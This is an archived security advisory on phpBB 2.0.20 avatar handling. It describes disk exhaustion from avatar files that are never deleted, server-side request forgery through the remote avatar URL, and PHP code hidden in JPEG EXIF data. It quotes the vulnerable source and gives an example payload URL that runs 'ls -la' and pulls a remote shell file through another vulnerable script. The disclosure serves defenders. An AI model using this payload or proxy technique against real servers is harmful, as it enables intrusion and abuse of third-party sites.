TUCoPS :: Web BBS :: Frequently Exploited :: b06-2171.htm

PHPBB 2.0.20 persistent issues with avatars
PHPBB 2.0.20 persistent issues with avatars
PHPBB 2.0.20 persistent issues with avatars


PHPBB 2.0.20 multiple issues with avatars=0D
=0D
some problems persistently lie in the way it handles remote and uploaded avatars:=0D
=0D
a remote user can:=0D
 =0D
(1) saturate the server with unuseful files, 'cause phpbb do not delete=0D
the previous one when you upload a new avatar=0D
=0D
(2) use PhpBB installations to launch exploits against other servers,=0D
using "avatarurl" argument when you modify your profile as path=0D
of a GET request.=0D
=0D
Look usercp_avatar.php near lines 125-153:=0D
...=0D
if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )=0D
	{=0D
		if ( empty($url_ary[4]) )=0D
		{=0D
			$error = true;=0D
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '
' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];=0D
			return;=0D
		}=0D
=0D
		$base_get = '/' . $url_ary[4];=0D
		$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;=0D
=0D
		if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )=0D
		{=0D
			$error = true;=0D
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '
' . $lang['No_connection_URL'] : $lang['No_connection_URL'];=0D
			return;=0D
		}=0D
=0D
		@fputs($fsock, "GET $base_get HTTP/1.1\r\n");=0D
		@fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");=0D
		@fputs($fsock, "Connection: close\r\n\r\n");=0D
=0D
		unset($avatar_data);=0D
		while( !@feof($fsock) )=0D
		{=0D
			$avatar_data .= @fread($fsock, $board_config['avatar_filesize']);=0D
		}=0D
		@fclose($fsock);=0D
...=0D
=0D
phpbb do not check if the user supplied value ends with an image extension, neither=0D
checks if the supplied string contains "&" and "?" chars. So, you can submit a value=0D
like this:=0D
=0D
http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt=0D 
=0D
phpbb will launch a GET request like this:=0D
=0D
GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0=0D 
HOST: some_vulnerable.host=0D
Connection: close=0D
 =0D
obviously you have no output, but this makes phpbb to be like a http proxy=0D
=0D
(3) inject some php code inside jpeg files as EXIF metadata content:=0D
this, in combinations with third party vulnerable code can be used=0D
to compromise the server where PHP is installed. =0D
Should be enough to check for php code inside the temporary files=0D
before to copy the new avatar in "images/avatars/" folder.=0D
=0D
rgod=0D
---------------------------------------------------------------------------------=0D
mail: rgod [at] autistici [dot] org=0D
site: http://retrogod.altervista.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH